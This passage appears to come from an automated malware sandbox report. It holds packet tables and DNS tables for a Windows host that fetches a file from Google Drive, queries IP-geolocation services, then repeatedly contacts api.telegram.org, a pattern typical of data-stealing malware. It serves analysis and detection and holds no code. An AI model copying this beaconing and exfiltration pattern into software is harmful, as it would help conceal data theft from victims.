                                                                                                          Jan 10, 2025 22:14:39.062776089 CET49986443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:39.062786102 CET44349986149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:39.105811119 CET4998580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:39.698436022 CET44349986149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:39.700474024 CET49986443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:39.700514078 CET44349986149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:39.700597048 CET49986443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:39.700607061 CET44349986149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.026748896 CET44349986149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.026843071 CET44349986149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.026896954 CET49986443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:40.027255058 CET49986443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:40.033289909 CET4998580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:40.034666061 CET4998780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:40.038340092 CET8049985132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.038389921 CET4998580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:40.039423943 CET8049987132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.039480925 CET4998780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:40.039592981 CET4998780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:40.044447899 CET8049987132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.847826958 CET8049987132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.852009058 CET49988443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:40.852049112 CET44349988149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.852118969 CET49988443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:40.852351904 CET49988443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:40.852365971 CET44349988149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:40.902650118 CET4998780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:41.484555960 CET44349988149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:41.486850023 CET49988443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:41.486862898 CET44349988149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:41.486931086 CET49988443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:41.486938953 CET44349988149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:41.704976082 CET44349988149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:41.705064058 CET44349988149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:41.705157042 CET49988443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:41.707124949 CET49988443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:41.736915112 CET4998780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:41.737695932 CET4998980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:41.742822886 CET8049987132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:41.743565083 CET8049989132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:41.743629932 CET4998780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:41.743654013 CET4998980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:41.747735977 CET4998980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:41.753468037 CET8049989132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:42.572724104 CET8049989132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:42.574081898 CET49990443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:42.574136019 CET44349990149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:42.574218988 CET49990443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:42.574479103 CET49990443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:42.574491978 CET44349990149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:42.621395111 CET4998980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:43.189793110 CET44349990149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:43.191714048 CET49990443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:43.191751003 CET44349990149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:43.191800117 CET49990443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:43.191812992 CET44349990149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:43.512492895 CET44349990149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:43.512572050 CET44349990149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:43.512768984 CET49990443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:43.513056993 CET49990443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:43.516338110 CET4998980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:43.517702103 CET4999180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:43.521908998 CET8049989132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:43.521975040 CET4998980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:43.522490978 CET8049991132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:43.522550106 CET4999180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:43.522624016 CET4999180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:43.527406931 CET8049991132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:44.362341881 CET8049991132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:44.372855902 CET49992443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:44.372895956 CET44349992149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:44.372980118 CET49992443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:44.392501116 CET49992443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:44.392513990 CET44349992149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:44.418271065 CET4999180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:45.012624025 CET44349992149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:45.015008926 CET49992443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:45.015031099 CET44349992149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:45.015099049 CET49992443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:45.015103102 CET44349992149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:45.287358999 CET44349992149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:45.287446976 CET44349992149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:45.287493944 CET49992443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:45.288161993 CET49992443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:45.291004896 CET4999180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:45.292186975 CET4999380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:45.295927048 CET8049991132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:45.295989990 CET4999180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:45.296945095 CET8049993132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:45.297108889 CET4999380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:45.297108889 CET4999380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:45.301843882 CET8049993132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:46.148102999 CET8049993132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:46.149394035 CET49994443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:46.149431944 CET44349994149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:46.149595022 CET49994443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:46.150053024 CET49994443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:46.150063038 CET44349994149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:46.199575901 CET4999380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:46.777334929 CET44349994149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:46.782321930 CET49994443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:46.782342911 CET44349994149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:46.782552958 CET49994443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:46.782574892 CET44349994149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:47.155157089 CET44349994149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:47.155260086 CET44349994149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:47.155334949 CET49994443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:47.161397934 CET49994443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:47.261995077 CET4999380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:47.263505936 CET4999580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:47.266972065 CET8049993132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:47.267021894 CET4999380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:47.268291950 CET8049995132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:47.268347025 CET4999580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:47.268685102 CET4999580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:47.273487091 CET8049995132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:48.297692060 CET8049995132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:48.299165964 CET49996443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:48.299207926 CET44349996149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:48.299304008 CET49996443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:48.299631119 CET49996443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:48.299644947 CET44349996149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:48.340172052 CET4999580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:48.950999975 CET44349996149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:48.952707052 CET49996443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:48.952732086 CET44349996149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:48.952786922 CET49996443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:48.952801943 CET44349996149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:49.270771980 CET44349996149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:49.270857096 CET44349996149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:49.270941019 CET49996443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:49.271323919 CET49996443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:49.274327040 CET4999580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:49.275485992 CET4999780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:49.279381037 CET8049995132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:49.279462099 CET4999580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:49.280571938 CET8049997132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:49.280642986 CET4999780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:49.280750036 CET4999780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:49.285485983 CET8049997132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:50.103286982 CET8049997132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:50.127609968 CET49998443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:50.127655983 CET44349998149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:50.127734900 CET49998443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:50.131877899 CET49998443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:50.131892920 CET44349998149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:50.152699947 CET4999780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:50.760504007 CET44349998149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:50.761950016 CET49998443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:50.761972904 CET44349998149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:50.762047052 CET49998443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:50.762059927 CET44349998149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:51.051805019 CET44349998149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:51.051903963 CET44349998149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:51.052006960 CET49998443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:51.052473068 CET49998443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:51.055190086 CET4999780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:51.056216002 CET4999980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:51.060220003 CET8049997132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:51.060875893 CET4999780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:51.061018944 CET8049999132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:51.064872026 CET4999980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:51.064979076 CET4999980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:51.069801092 CET8049999132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:52.240042925 CET8049999132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:52.242495060 CET50000443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:52.242549896 CET44350000149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:52.242712975 CET50000443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:52.243525028 CET50000443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:52.243542910 CET44350000149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:52.293329954 CET4999980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:52.877619028 CET44350000149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:52.879246950 CET50000443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:52.879276991 CET44350000149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:52.879365921 CET50000443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:52.879371881 CET44350000149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:53.244752884 CET44350000149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:53.244961977 CET44350000149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:53.245026112 CET50000443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:53.249505997 CET50000443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:53.636156082 CET4999980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:53.636881113 CET5000180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:53.641146898 CET8049999132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:53.641211987 CET4999980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:53.641724110 CET8050001132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:53.641824007 CET5000180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:53.641976118 CET5000180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:53.646748066 CET8050001132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:54.498096943 CET8050001132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:54.499603987 CET50002443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:54.499650955 CET44350002149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:54.499754906 CET50002443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:54.500029087 CET50002443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:54.500040054 CET44350002149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:54.543466091 CET5000180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:55.157416105 CET44350002149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:55.159526110 CET50002443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:55.159538031 CET44350002149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:55.159593105 CET50002443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:55.159600019 CET44350002149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:55.523797035 CET44350002149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:55.523880005 CET44350002149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:55.523947954 CET50002443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:55.524362087 CET50002443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:55.527345896 CET5000180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:55.528558016 CET5000380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:55.532342911 CET8050001132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:55.532413960 CET5000180192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:55.533402920 CET8050003132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:55.533472061 CET5000380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:55.533571005 CET5000380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:55.538360119 CET8050003132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:56.362341881 CET8050003132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:56.416321039 CET5000380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:56.416837931 CET50004443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:56.416874886 CET44350004149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:56.416951895 CET50004443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:56.417617083 CET50004443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:56.417632103 CET44350004149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:57.051393032 CET44350004149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:57.055207014 CET50004443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:57.055224895 CET44350004149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:57.061765909 CET50004443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:57.061775923 CET44350004149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:57.378623009 CET44350004149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:57.378736973 CET44350004149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:57.378859043 CET50004443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:57.379374027 CET50004443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:57.382673025 CET5000380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:57.384020090 CET5000580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:57.387615919 CET8050003132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:57.388782978 CET8050005132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:57.388854027 CET5000380192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:57.388936043 CET5000580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:57.389036894 CET5000580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:57.393739939 CET8050005132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:58.223989964 CET8050005132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:58.225498915 CET50006443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:58.225524902 CET44350006149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:58.225672960 CET50006443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:58.226110935 CET50006443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:58.226123095 CET44350006149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:58.277734995 CET5000580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:58.853425026 CET44350006149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:58.854938030 CET50006443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:58.854954004 CET44350006149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:58.855015993 CET50006443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:58.855026007 CET44350006149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:59.124793053 CET44350006149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:59.125010014 CET44350006149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:14:59.125161886 CET50006443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:59.150526047 CET50006443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:14:59.155565977 CET5000580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:59.156673908 CET5000780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:59.160557985 CET8050005132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:59.160609961 CET5000580192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:59.161464930 CET8050007132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:14:59.161524057 CET5000780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:59.161710978 CET5000780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:14:59.166578054 CET8050007132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.047101974 CET8050007132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.053869963 CET50008443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:15:00.053942919 CET44350008149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.054019928 CET50008443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:15:00.054339886 CET50008443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:15:00.054356098 CET44350008149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.090235949 CET5000780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:15:00.704207897 CET44350008149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.706481934 CET50008443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:15:00.706511974 CET44350008149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.706587076 CET50008443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:15:00.706598043 CET44350008149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.971846104 CET44350008149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.971951008 CET44350008149.154.167.220192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.972038031 CET50008443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:15:00.972515106 CET50008443192.168.2.7149.154.167.220
                                                                                                          Jan 10, 2025 22:15:00.976309061 CET5000780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:15:00.977269888 CET5000980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:15:00.981265068 CET8050007132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.981364965 CET5000780192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:15:00.982114077 CET8050009132.226.8.169192.168.2.7
                                                                                                          Jan 10, 2025 22:15:00.982182980 CET5000980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:15:00.982326984 CET5000980192.168.2.7132.226.8.169
                                                                                                          Jan 10, 2025 22:15:00.987113953 CET8050009132.226.8.169192.168.2.7
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 22:14:12.880251884 CET5522353192.168.2.71.1.1.1
                                                                                                          Jan 10, 2025 22:14:12.887218952 CET53552231.1.1.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.129952908 CET6346053192.168.2.71.1.1.1
                                                                                                          Jan 10, 2025 22:14:14.137132883 CET53634601.1.1.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:18.029521942 CET5951353192.168.2.71.1.1.1
                                                                                                          Jan 10, 2025 22:14:18.036047935 CET53595131.1.1.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:19.725898981 CET5992653192.168.2.71.1.1.1
                                                                                                          Jan 10, 2025 22:14:19.733231068 CET53599261.1.1.1192.168.2.7
                                                                                                          Jan 10, 2025 22:14:26.250066042 CET6241353192.168.2.71.1.1.1
                                                                                                          Jan 10, 2025 22:14:26.257013083 CET53624131.1.1.1192.168.2.7
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 22:14:12.880251884 CET192.168.2.71.1.1.10xcd03Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:14.129952908 CET192.168.2.71.1.1.10x1410Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:18.029521942 CET192.168.2.71.1.1.10x8e62Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:19.725898981 CET192.168.2.71.1.1.10x8b50Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:26.250066042 CET192.168.2.71.1.1.10x86c3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 22:14:12.887218952 CET1.1.1.1192.168.2.70xcd03No error (0)drive.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:14.137132883 CET1.1.1.1192.168.2.70x1410No error (0)drive.usercontent.google.com142.250.185.65A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:18.036047935 CET1.1.1.1192.168.2.70x8e62No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:18.036047935 CET1.1.1.1192.168.2.70x8e62No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:18.036047935 CET1.1.1.1192.168.2.70x8e62No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:18.036047935 CET1.1.1.1192.168.2.70x8e62No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 22:14:18.036047935 CET1.1.1.1192.168.2.70x8e62No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
